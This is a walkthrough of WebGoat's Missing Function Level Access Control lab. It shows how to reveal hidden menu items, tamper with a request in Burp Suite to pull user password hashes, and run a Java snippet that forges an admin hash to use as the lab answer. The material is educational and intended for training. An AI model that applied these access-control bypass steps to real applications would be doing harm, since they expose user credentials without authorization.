In this walk through, we will be going through the Missing Function Level Access Control vulnerability section from Webgoat Labs. We will be exploring and exploiting Missing Function Level Access Control and learn how application are affected because of it. So, let’s get started with the Hacking without any delay.
Table of Contents
Missing Function Level Access Control
1. Relying on obscurity
- In this task we have to find to invisible menu items in the menu which will be useful for further tasks in this challenge.
- I used dev tools inspector and found the hidden menu items.
2. Gathering User Info
- In this one we have to find a hash of user Jerry’s account. We have to take hints and input from the previously found information. As per our previous task we found a directory called users.
- I intercepted the request via Burpsuite and changed the method to GET. The target url to users and the Content-Type to application/json which gives me the results consisting the user’s hash.
3. The company fixed the problem, right?
- In this one, the company has found the vulnerable endpoint and made an emergency fix for it. I tried the previous technique on this and it do display the response however the solution was not correct.
- I peeked into the application source code and found out the user’s password which is in plain text. Further, the application is now using a different salt for the admin accounts which is “DeliberatelyInsecure1235”. Next, the application takes the username, salt and password and encrypt it with SHA256 algorithm and then at last encode it with base64.
- Now that we know that, let’s use the below program to generate our desired hash.
import java.nio.charset.StandardCharsets; import java.security.MessageDigest; import java.util.Base64; public class App { public static void main(String[] args) throws Exception { System.out.println("Hello, World!"); String password = "doesnotreallymatter"; String username = "Jerry"; String passwordSaltStrong = "DeliberatelyInsecure1235"; try { MessageDigest md = MessageDigest.getInstance("SHA-256"); String salted = password + passwordSaltStrong + username; byte[] hash = md.digest(salted.getBytes(StandardCharsets.UTF_8)); System.out.println(Base64.getEncoder().encodeToString(hash)); } catch (Error e) { } } }
d4T2ahJN4fWP83s9JdLISio7Auh4mWhFT1Q38S6OewM=
- Submit it to complete the challenge.
Also Read: Webgoat – JWT tokens
Conclusion:
So, we finally completed the Webgoat Missing Function Level Access Control Vulnerability section. Next, we can mitigate these types of attacks by completely denying access to everything and then every specific role can be explicitly granted access for each function. Along with that, the application must not reveal sensitive information on the front end or responses which might then be misused to attack it later and Security through Obscurity must not be used in any circumstance. On that note, i will take your leave and will meet you in next one with another Webgoat vulnerability writeup, till then “Keep Hacking”.